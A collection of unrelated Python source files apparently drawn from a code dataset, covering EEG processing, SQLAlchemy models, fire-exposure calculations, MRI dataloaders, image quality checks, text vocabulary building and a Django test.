ixdev = np.array(np.where(events_orig[:,2]==2))
ixstd= ixdev-1
events = events_orig[np.sort(np.array(np.hstack((ixstd , ixdev)))),:]
events = np.squeeze(events, axis=0)
tmin, tmax = -0.2, 0.5
raw4detect = raw.copy()
raw4detect._data,iirstate = asr.YW_filter(raw._data,raw.info['sfreq'],None) ## HERE
epochs4Detect = mne.Epochs(raw4detect, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=True,baseline=None, reject=None, picks=picks_eeg)
epochs_filt = mne.Epochs(raw, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=None,baseline=None, reject=None, picks=picks_eeg)
Data4detect = epochs4Detect.get_data()
Data2Correct = epochs_filt.get_data()
DataClean = np.zeros((Data2Correct.shape))
for i_epoch in range(Data4detect.shape[0]):
EpochYR = Data4detect[i_epoch,:,:]
Epoch2Corr = Data2Correct[i_epoch,:,:]
DataClean[i_epoch,:,:] = asr.asr_process_on_epoch(EpochYR,Epoch2Corr,state)
epochs_clean = mne.EpochsArray(DataClean,info=epochs_filt.info,events=events,event_id=event_id)
srate = raw.info['sfreq']
evoked_std = epochs_filt['Std'].average(picks=picks_eeg)
evoked_dev = epochs_filt['Dev'].average(picks=picks_eeg)
evoked_clean_std = epochs_clean['Std'].average(picks=picks_eeg)
evoked_clean_dev = epochs_clean['Dev'].average(picks=picks_eeg)
evoked_clean_std.first=-200
evoked_clean_std.last= tmax*srate
evoked_clean_dev.first=-200
evoked_clean_dev.last= tmax*srate
evoked_clean_std.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3)
evoked_clean_dev.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3)
evokeds = [evoked_std, evoked_dev, evoked_clean_std, evoked_clean_dev]
colors = 'blue', 'red','steelblue','magenta'
plot_evoked_topo(evokeds, color=colors, title='Std Dev', background_color='w')
plt.show()
evoked_clean_MMN=evoked_clean_std.copy()
evoked_clean_MMN.data = (evoked_clean_dev.data - evoked_clean_std.data)
evoked_MMN =evoked_clean_MMN.copy()
evoked_MMN.data = (evoked_dev.data-evoked_std.data)
evokeds_MMN= [evoked_clean_MMN,evoked_MMN]
colors = 'red', 'black'
plot_evoked_topo(evokeds_MMN, color=colors, title='MMN', background_color='w')
plt.show()
kwargs = dict(times=np.arange(-0.1, 0.40, 0.025), vmin=-1.5, vmax=1.5, layout='auto',
head_pos=dict(center=(0., 0.), scale=(1., 1.)))
evoked_MMN.plot_topomap(**kwargs)
evoked_clean_MMN.plot_topomap(**kwargs)
| 1.710938 | 2 |
mediapp_be/config/__init__.py | MedPy-C/backend | 0 | 12799123 | <reponame>MedPy-C/backend
import os
from .development import Development
# from .production import Production
# from .test import Test
def get_configs(enviroment=None):
from mediapp_be.config.test import Test
configs = {
'dev': Development,
# 'prd': Production,
'test': Test
}
if not enviroment:
enviroment = os.environ.get('MEDIAPP_BE_API_ENV', 'dev')
return configs[enviroment]()
env = get_configs()
| 2.109375 | 2 |
src/ebonite/ext/sqlalchemy/models.py | zyfra/ebonite | 270 | 12799124 | from abc import abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar
from pyjackson import dumps, loads
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from ebonite.core.objects import DatasetType
from ebonite.core.objects.artifacts import ArtifactCollection
from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline,
PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task)
from ebonite.core.objects.dataset_source import DatasetSource
from ebonite.core.objects.metric import Metric
from ebonite.core.objects.requirements import Requirements
SQL_OBJECT_FIELD = '_sqlalchemy_object'
def json_column():
return Column(Text)
def safe_loads(payload, as_class):
return loads(payload, Optional[as_class])
def sqlobject(obj):
return getattr(obj, SQL_OBJECT_FIELD, None)
def update_attrs(obj, **attrs):
for name, value in attrs.items():
setattr(obj, name, value)
T = TypeVar('T')
S = TypeVar('S', bound='Attaching')
class Attaching:
id = ...
name = ...
def attach(self, obj):
setattr(obj, SQL_OBJECT_FIELD, self)
return obj
@classmethod
def from_obj(cls: Type[S], obj: T, new=False) -> S:
kwargs = cls.get_kwargs(obj)
existing = sqlobject(obj)
if not new and existing is not None:
update_attrs(existing, **kwargs)
return existing
return cls(**kwargs)
@classmethod
@abstractmethod
def get_kwargs(cls, obj: T) -> dict:
pass # pragma: no cover
@abstractmethod
def to_obj(self) -> T:
pass # pragma: no cover
Base = declarative_base()
class SProject(Base, Attaching):
__tablename__ = 'projects'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
tasks: Iterable['STask'] = relationship("STask", back_populates="project")
def to_obj(self) -> Project:
p = Project(self.name, id=self.id, author=self.author, creation_date=self.creation_date)
for task in self.tasks:
p._tasks.add(task.to_obj())
return self.attach(p)
@classmethod
def get_kwargs(cls, project: Project) -> dict:
return dict(id=project.id,
name=project.name,
author=project.author,
creation_date=project.creation_date,
tasks=[STask.from_obj(t) for t in project.tasks.values()])
class STask(Base, Attaching):
__tablename__ = 'tasks'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
project_id = Column(Integer, ForeignKey('projects.id'), nullable=False)
project = relationship("SProject", back_populates="tasks")
models: Iterable['SModel'] = relationship("SModel", back_populates="task")
pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task')
images: Iterable['SImage'] = relationship("SImage", back_populates='task')
datasets = Column(Text)
metrics = Column(Text)
evaluation_sets = Column(Text)
__table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),)
def to_obj(self) -> Task:
task = Task(id=self.id,
name=self.name,
author=self.author,
creation_date=self.creation_date,
project_id=self.project_id,
datasets=safe_loads(self.datasets, Dict[str, DatasetSource]),
metrics=safe_loads(self.metrics, Dict[str, Metric]),
evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet]))
for model in self.models:
task._models.add(model.to_obj())
for pipeline in self.pipelines:
task._pipelines.add(pipeline.to_obj())
for image in self.images:
task._images.add(image.to_obj())
return self.attach(task)
@classmethod
def get_kwargs(cls, task: Task) -> dict:
return dict(id=task.id,
name=task.name,
author=task.author,
creation_date=task.creation_date,
project_id=task.project_id,
models=[SModel.from_obj(m) for m in task.models.values()],
images=[SImage.from_obj(i) for i in task.images.values()],
pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()],
datasets=dumps(task.datasets),
metrics=dumps(task.metrics),
evaluation_sets=dumps(task.evaluation_sets))
class SModel(Base, Attaching):
__tablename__ = 'models'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
wrapper = Column(Text)
artifact = Column(Text)
requirements = Column(Text)
description = Column(Text)
params = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="models")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),)
def to_obj(self) -> Model:
model = Model(name=self.name,
wrapper_meta=safe_loads(self.wrapper, dict),
author=self.author,
creation_date=self.creation_date,
artifact=safe_loads(self.artifact, ArtifactCollection),
requirements=safe_loads(self.requirements, Requirements),
description=self.description,
params=safe_loads(self.params, Dict[str, Any]),
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults]))
return self.attach(model)
@classmethod
def get_kwargs(cls, model: Model) -> dict:
return dict(id=model.id,
name=model.name,
author=model.author,
creation_date=model.creation_date,
wrapper=dumps(model.wrapper_meta),
artifact=dumps(model.artifact),
requirements=dumps(model.requirements),
description=model.description,
params=dumps(model.params),
task_id=model.task_id,
evaluations=dumps(model.evaluations))
class SPipeline(Base, Attaching):
__tablename__ = 'pipelines'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
steps = Column(Text)
input_data = Column(Text)
output_data = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="pipelines")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),)
def to_obj(self) -> Pipeline:
pipeline = Pipeline(name=self.name,
steps=safe_loads(self.steps, List[PipelineStep]),
input_data=safe_loads(self.input_data, DatasetType),
output_data=safe_loads(self.output_data, DatasetType),
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, EvaluationResults))
return self.attach(pipeline)
@classmethod
def get_kwargs(cls, pipeline: Pipeline) -> dict:
return dict(id=pipeline.id,
name=pipeline.name,
author=pipeline.author,
creation_date=pipeline.creation_date,
steps=dumps(pipeline.steps),
input_data=dumps(pipeline.input_data),
output_data=dumps(pipeline.output_data),
task_id=pipeline.task_id,
evaluations=dumps(pipeline.evaluations))
class SImage(Base, Attaching):
__tablename__ = 'images'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="images")
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
source = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),)
def to_obj(self) -> Image:
image = Image(name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
params=safe_loads(self.params, Image.Params),
source=safe_loads(self.source, Buildable),
environment_id=self.environment_id)
return self.attach(image)
@classmethod
def get_kwargs(cls, image: Image) -> dict:
return dict(id=image.id,
name=image.name,
author=image.author,
creation_date=image.creation_date,
task_id=image.task_id,
params=dumps(image.params),
source=dumps(image.source),
environment_id=image.environment_id)
class SRuntimeEnvironment(Base, Attaching):
__tablename__ = 'environments'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
params = Column(Text)
def to_obj(self) -> RuntimeEnvironment:
environment = RuntimeEnvironment(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
params=safe_loads(self.params, RuntimeEnvironment.Params))
return self.attach(environment)
@classmethod
def get_kwargs(cls, environment: RuntimeEnvironment) -> dict:
return dict(id=environment.id,
name=environment.name,
author=environment.author,
creation_date=environment.creation_date,
params=dumps(environment.params))
class SRuntimeInstance(Base, Attaching):
__tablename__ = 'instances'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
image_id = Column(Integer, ForeignKey('images.id'), nullable=False)
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
__table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),)
def to_obj(self) -> RuntimeInstance:
instance = RuntimeInstance(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
image_id=self.image_id,
environment_id=self.environment_id,
params=safe_loads(self.params, RuntimeInstance.Params))
return self.attach(instance)
@classmethod
def get_kwargs(cls, instance: RuntimeInstance) -> dict:
return dict(id=instance.id,
name=instance.name,
author=instance.author,
creation_date=instance.creation_date,
image_id=instance.image_id,
environment_id=instance.environment_id,
params=dumps(instance.params))
| 2.140625 | 2 |
sfeprapy/func/pd_6688_1_2_2007.py | fsepy/sfeprapy | 4 | 12799125 | # -*- coding: utf-8 -*-
import numpy as np
def annex_b_equivalent_time_of_fire_exposure(
q_fk, delta_1, m, k_b, A_f, H, A_vh, A_vv, delta_h
):
"""Calculates time equivalence of standard fire exposure in accordance with PD 6688-1-2 Annex B
IAN FU 12 APRIL 2019
:param q_fk: [MJ/m2] Fire load density
:param delta_1: Active suppression factor
:param m: Combustion factor
:param k_b: Conversion factor
:param A_f: [m2] Floor area of the compartment
:param H: [m] Height of the compartment
:param A_vh: [m2] Horizontal area
:param A_vv: [m2] Vertical area
:param delta_h: Height factor
:return: Equivalent time exposure
SUPPLEMENT INFO:
Table A.4 - Design fire growth rates (from PD 7974-1:2003, Table 3)
| BUILDING | USE |
|------------------------------------------------------------------|------------|
| Picture gallery | Slow |
| Passenger stations and termini for air_ rail_ road or sea travel | Slow |
| Classroom (school) | Medium |
| Dwelling | Medium |
| Office | Medium |
| Hotel reception | Medium |
| Hotel bedroom | Medium |
| Hospital room | Medium |
| Library | Fast |
| Theatre (cinema) | Fast |
| Shop | Fast |
| Industrial storage or plant room | Ultra-fast |
Table A.5 - Heat release rate per unit area of fire for different occupancies (from PD 7974-1:2003)
| OCCUPANCY | HEAT RELEASE RATE PER UNIT AREA | $Q''$ [kW/m2] | |
|-------------|---------------------------------|---------------|---|
| Shops | 550 | | |
| Offices | 290 | | |
| Hotel rooms | 249 | | |
| Industrial | 86-620 | | |
EXAMPLE:
>>> kwargs = dict(q_fk=900, delta_1=0.61, m=1, k_b=0.09, H=4, A_f=856.5, A_vh=0, A_vv=235.2, delta_h=2)
>>> print(annex_b_equivalent_time_of_fire_exposure(**kwargs))
>>> 74.27814882871894
"""
# B.1
# Design fire load [MJ/m2]
q_fd = q_fk * delta_1 * m
# B.2
# Vertical opening factor
alpha_v = min([max([A_vv / A_f, 0.025]), 0.25])
# horizontal opening factor
alpha_h = A_vh / A_f
# just a factor
b_v = (
12.5 * (1 + 10 * alpha_v - alpha_v ** 2)
if (12.5 * (1 + 10 * alpha_v - alpha_v ** 2)) >= 10
else np.nan
)
# total ventilation factor
w_f = ((6 / H) ** 0.3) * ((0.62 + 90 * (0.4 - alpha_v) ** 4) / (1 + b_v * alpha_h))
w_f = w_f if A_f >= 100 else np.nan
return q_fd * k_b * w_f * delta_h
if __name__ == "__main__":
input_params = dict(
q_fk=900,
delta_1=0.61,
m=1,
k_b=0.09,
H=4,
A_f=856.5,
A_vh=0,
A_vv=235.2,
delta_h=2,
)
input_params = dict(
q_fk=900,
delta_1=1.0,
m=1,
k_b=0.09,
H=4,
A_f=877,
A_vh=0,
A_vv=98.35,
delta_h=2,
)
res = annex_b_equivalent_time_of_fire_exposure(**input_params)
print(res / 60)
| 2.484375 | 2 |
dataloader.py | colorfulbrain/brain2020 | 91 | 12799126 | <reponame>colorfulbrain/brain2020
from __future__ import print_function, division
import os
import torch
import numpy as np
from torch.utils.data import Dataset, DataLoader
from utils import PatchGenerator, padding, read_csv, read_csv_complete, read_csv_complete_apoe, get_AD_risk
import random
import pandas as pd
import csv
"""
dataloaders are defined in this scripts:
1. FCN dataloader (data split into 60% train, 20% validation and 20% testing)
(a). Training stage: use random patches to train classification FCN model
(b). Validation stage: forward whole volume MRI to FCN to get Disease Probability Map (DPM). use MCC of DPM as criterion to save model parameters
(c). Testing stage: get all available DPMs for the development of MLP
2. MLP dataloader (use the exactly same split as FCN dataloader)
(a). Training stage: train MLP on DPMs from the training portion
(b). Validation stage: use MCC as criterion to save model parameters
(c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets
3. CNN dataloader (baseline classification model to be compared with FCN+MLP framework)
(a). Training stage: use whole volume to train classification FCN model
(b). Validation stage: use MCC as criterion to save model parameters
(c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets
"""
class Augment:
def __init__(self):
self.contrast_factor = 0.2
self.bright_factor = 0.4
self.sig_factor = 0.2
def change_contrast(self, image):
ratio = 1 + (random.random() - 0.5)*self.contrast_factor
return image.mean() + ratio*(image - image.mean())
def change_brightness(self, image):
val = (random.random() - 0.5)*self.bright_factor
return image + val
def add_noise(self, image):
sig = random.random() * self.sig_factor
return np.random.normal(0, sig, image.shape) + image
def apply(self, image):
image = self.change_contrast(image)
image = self.change_brightness(image)
image = self.add_noise(image)
return image
class CNN_Data(Dataset):
"""
csv files ./lookuptxt/*.csv contains MRI filenames along with demographic and diagnosis information
"""
def __init__(self, Data_dir, exp_idx, stage, seed=1000):
random.seed(seed)
self.Data_dir = Data_dir
if stage in ['train', 'valid', 'test']:
self.Data_list, self.Label_list = read_csv('./lookupcsv/exp{}/{}.csv'.format(exp_idx, stage))
elif stage in ['ADNI', 'NACC', 'AIBL', 'FHS']:
self.Data_list, self.Label_list = read_csv('./lookupcsv/{}.csv'.format(stage))
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32)
data = np.expand_dims(data, axis=0)
return data, label
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
class FCN_Data(CNN_Data):
def __init__(self,
Data_dir,
exp_idx,
stage,
whole_volume=False,
seed=1000,
patch_size=47,
transform=Augment()):
"""
:param Data_dir: data path
:param exp_idx: experiment index maps to different data splits
:param stage: stage could be 'train', 'valid', 'test' and etc ...
:param whole_volume: if whole_volume == True, get whole MRI;
if whole_volume == False and stage == 'train', sample patches for training
:param seed: random seed
:param patch_size: patch size has to be 47, otherwise model needs to be changed accordingly
:param transform: transform is about data augmentation, if transform == None: no augmentation
for more details, see Augment class
"""
CNN_Data.__init__(self, Data_dir, exp_idx, stage, seed)
self.stage = stage
self.transform = transform
self.whole = whole_volume
self.patch_size = patch_size
self.patch_sampler = PatchGenerator(patch_size=self.patch_size)
def __getitem__(self, idx):
label = self.Label_list[idx]
if self.stage == 'train' and not self.whole:
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy', mmap_mode='r').astype(np.float32)
patch = self.patch_sampler.random_sample(data)
if self.transform:
patch = self.transform.apply(patch).astype(np.float32)
patch = np.expand_dims(patch, axis=0)
return patch, label
else:
data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32)
data = np.expand_dims(padding(data, win_size=self.patch_size // 2), axis=0)
return data, label
class MLP_Data(Dataset):
def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000):
random.seed(seed)
self.exp_idx = exp_idx
self.Data_dir = Data_dir
self.roi_threshold = roi_threshold
self.roi_count = roi_count
if choice == 'count':
self.select_roi_count()
else:
self.select_roi_thres()
if stage in ['train', 'valid', 'test']:
self.path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage)
else:
self.path = './lookupcsv/{}.csv'.format(stage)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete(self.path)
self.risk_list = [get_AD_risk(np.load(Data_dir+filename+'.npy'))[self.roi] for filename in self.Data_list]
self.in_size = self.risk_list[0].shape[0]
def select_roi_thres(self):
self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx))
self.roi = self.roi > self.roi_threshold
for i in range(self.roi.shape[0]):
for j in range(self.roi.shape[1]):
for k in range(self.roi.shape[2]):
if i%3!=0 or j%2!=0 or k%3!=0:
self.roi[i,j,k] = False
def select_roi_count(self):
self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx))
tmp = []
for i in range(self.roi.shape[0]):
for j in range(self.roi.shape[1]):
for k in range(self.roi.shape[2]):
if i%3!=0 or j%2!=0 or k%3!=0: continue
tmp.append((self.roi[i,j,k], i, j, k))
tmp.sort()
tmp = tmp[-self.roi_count:]
self.roi = self.roi != self.roi
for _, i, j, k in tmp:
self.roi[i,j,k] = True
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
risk = self.risk_list[idx]
demor = self.demor_list[idx]
return risk, label, np.asarray(demor).astype(np.float32)
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
class MLP_Data_apoe(MLP_Data):
def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000):
super().__init__(Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete_apoe(self.path)
class CNN_MLP_Data(Dataset):
def __init__(self, Data_dir, exp_idx, stage, seed=1000):
random.seed(seed)
self.exp_idx = exp_idx
self.Data_dir = Data_dir
if stage in ['train', 'valid', 'test']:
path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage)
else:
path = './lookupcsv/{}.csv'.format(stage)
self.Data_list, self.Label_list, self.demor_list = read_csv_complete(path)
self.risk_list = [np.load(Data_dir + filename + '.npy') for filename in self.Data_list]
self.risk_list = [self.rescale(a) for a in self.risk_list]
self.in_size = self.risk_list[0].shape[0]
def __len__(self):
return len(self.Data_list)
def __getitem__(self, idx):
label = self.Label_list[idx]
risk = self.risk_list[idx]
demor = self.demor_list[idx]
return risk, label, np.asarray(demor).astype(np.float32)
def rescale(self, x):
return (x + 8) / 20.0
def get_sample_weights(self):
count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(
self.Label_list.count(1))
weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list]
return weights, count0 / count1
if __name__ == "__main__":
data = CNN_MLP_Data(Data_dir='./DPMs/cnn_exp1/', exp_idx=1, stage='train')
dataloader = DataLoader(data, batch_size=10, shuffle=False)
for risk, label, demor in dataloader:
print(risk.shape, label, demor) | 2.90625 | 3 |
analysis.py | bijonguha/Image-Analysis | 0 | 12799127 | <gh_stars>0
import cv2
import numpy as np
from skimage.exposure import is_low_contrast
import matplotlib.pyplot as plt
def check_contrast(path, method='rms'):
'''
Check contrast of given images using
RMS or Michelson method
path : str
path of given image
method : str
method 'rms' or 'mich'
Returns
None
'''
img = cv2.imread(path)
plt.figure()
if method == 'rms':
img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
contrast = img_grey.std()
print(contrast, end = ' ')
if(contrast > 45):
print('Normal')
plt.title('Normal')
else:
print('Low')
plt.title('Low')
elif method == 'mich': #michelson
Y = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)[:,:,0]
# compute min and max of Y
min = int(np.min(Y))
max = int(np.max(Y))
# compute contrast
contrast = (max-min)/(max+min)
print(contrast, end = ' ')
if(contrast > 0.8):
print('Normal')
plt.title('Normal')
else:
print('Low')
plt.title('Low')
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) )
plt.show()
def variance_of_laplacian(image):
'''
Compute the Laplacian of the image and return its variance
'''
return cv2.Laplacian(image, cv2.CV_64F).var()
def check_blur(path):
img = cv2.imread(path)
img_gray = cv2.imread(path,0)
var = variance_of_laplacian(img_gray)
plt.figure()
if var<100:
print('Blurry')
plt.title('Blurry')
else:
print('Normal')
plt.title('Normal')
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) )
plt.show()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='FcarScan Task - Blur and Contrast check')
parser.add_argument('--image', default='view1.jpeg', type=str, help='Path of the image file')
parser.add_argument('--folder', default='False', type=str, help='True if path is a directory')
parser.add_argument('--method', default='rms', type=str, help='RMS (rms) or Michelson (mich)')
parser.add_argument('--choice', default='blur', type=str, help='Blur (blur) or Contrast (con) Analysis')
args = parser.parse_args()
if args.choice == 'blur':
print('Blur Analysis')
if args.folder == 'True':
import os
files = os.listdir(args.image)
files = [os.path.join(args.image, file) for file in files]
for file in files:
print('Image name :', file, end=' ')
check_blur(file)
else:
print('Image name :', args.image, end=' ')
check_blur(args.image)
else:
if args.folder == 'True':
import os
files = os.listdir(args.image)
files = [os.path.join(args.image, file) for file in files]
for file in files:
print('Image name :', file, end=' ')
check_contrast(file, args.method)
else:
print('Image name :', args.image, end=' ')
check_contrast(args.image,args.method)
| 3.015625 | 3 |
WordInput.py | Lee-Jooho/wordembedding | 0 | 12799128 | import numpy as np
import string
import re
import nltk
nltk.download('stopwords')
stop_words = nltk.corpus.stopwords.words('english')
class word_inform():
def __init__(self):
self.inform = {}
def wordinput(self):
WI = input('문장을 입력해주세요 : ') # 문장 받아오기. WI = word input.
WI = WI.replace('\n',' ') # 문단에 줄 내림이 있다면, 스페이스바로 바꿔주기
#be = {'am', 'is', 'are', 'be' , 'was', 'were'} # be 동사 저장.
WI = WI.lower()
#WI = WI.replace("i'm",'i am') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he's",'he is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she's",'she is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("that's",'that is') # be동사를 찾아내기 위해, 변환을 해준다
#WI = WI.replace("what's",'what is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("it's",'it is') # be동사를 찾아내기 위해, 변환을 해준다. (is 줄임말 풀어주기.)
#WI = WI.replace("you're",'you are') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they're",'they are') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we're",'we are') # be동사를 찾아내기 위해, 변환을 해준다.
#Auxiliary_verb = {'will','would','can','could','shall','should','may','might','must'}
#WI = WI.replace("i'll",'i will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("you'll",'you will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they'll",'they will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we'll",'we will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he'll",'he will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she'll",'she will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("it'll",'it will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("that'll",'that will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("i'd",'i would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("you'd",'you would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they'd",'they would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we'd",'we would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he'd",'he would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she'd",'she would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = re.sub("[.]{2,}",'',WI) # 마침표 두개이상 없애기
WI = re.sub('[\\w.]+@[\\w.]+',' ',WI)
WI = re.sub("[?!'.]{1,}",'.',WI)
WI = re.sub("[^\w\s'.]+",'',WI) # 특수문자 제거하기 따옴표는 제거하지 않음... >> stop words에 포함된 단어 you'll 같은 거 때문.
WI = re.sub("[.]{1,}",'.',WI)
sentence = WI.strip(string.punctuation).split('.') # 문단에 마침표가 있다면, 문장을 분리해주기. 마지막에 있는 구두점 떼어주기.
sentence_words = [s.split() for s in sentence] # 각각의 문장속에 있는 단어 분리 해주기.
self.inform['sentence_words'] = sentence_words
def word_voc(self,voc):
before_voc_length = len(voc)
sentence_words = self.inform['sentence_words'] # 입력받은 문장 그대로.
for length in range(len(sentence_words)):
for vocab in sentence_words[length]:
if vocab.isdigit() == False: # 숫자가 계속 학습하는 문장에 들어가서 학습 효율이 떨어지는 듯 하다. ( 따라서 숫자는 제외한다.)
if vocab not in stop_words:
if vocab not in voc:
voc.append(vocab)
self.inform['voc'] = voc
after_voc_length = len(voc)
self.inform['voc_length_diff'] = (after_voc_length - before_voc_length)
self.inform['voc_length'] = after_voc_length
word_vector = [[] for i in sentence_words]
word_sentence = [[] for i in sentence_words]
voc_vectors = []
for word in voc:
voc_vector = np.zeros_like(voc, dtype = int)# 단어장 크기의 새로운 벡터를 만든다.
index_of_input_word = voc.index(word)
voc_vector[index_of_input_word] += 1 # 한단어가 단어장의 몇번 index에 있는지를 확인.
voc_vectors.append(voc_vector)
self.inform['voc_vectors'] = voc_vectors
# word_vector >> 입력받은 문장들을 단어별로 구분해 놓은 리스트.
for length in range(len(sentence_words)):
for word in sentence_words[length]:
if word.isdigit() == False: # 숫자가 계속 학습하는 문장에 들어가서 학습 효율이 떨어지는 듯 하다. ( 따라서 숫자는 제외한다.)
if word not in stop_words:
voc_vector = np.zeros_like(voc, dtype = int)# 단어장 크기의 새로운 벡터를 만든다.
index_of_input_word = voc.index(word)
voc_vector[index_of_input_word] += 1 # 한단어가 단어장의 몇번 index에 있는지를 확인.
word_vector[length].append(voc_vector)
word_sentence[length].append(word)
self.inform['sentence_words'] = word_sentence
self.inform['word_vector'] = word_vector
| 3.375 | 3 |
django/publicmapping/redistricting/tests/test_score_statistics_set.py | azavea/district-builder-dtl-pa | 5 | 12799129 | from base import BaseTestCase
from django.contrib.auth.models import User
from redistricting.models import *
class StatisticsSetTestCase(BaseTestCase):
fixtures = [
'redistricting_testdata.json',
'redistricting_testdata_geolevel2.json',
'redistricting_statisticssets.json',
]
def setUp(self):
super(StatisticsSetTestCase, self).setUp()
display = ScoreDisplay.objects.get(title='Demographics')
summary = ScorePanel.objects.get(title='Plan Summary')
demographics = ScorePanel.objects.get(title='Demographics')
display.scorepanel_set.add(summary)
display.scorepanel_set.add(demographics)
functions = ScoreFunction.objects.filter(
name__in=('Voting Age Population',
'Hispanic voting-age population', 'Total Population'))
demographics.score_functions = functions.all()
demographics.save()
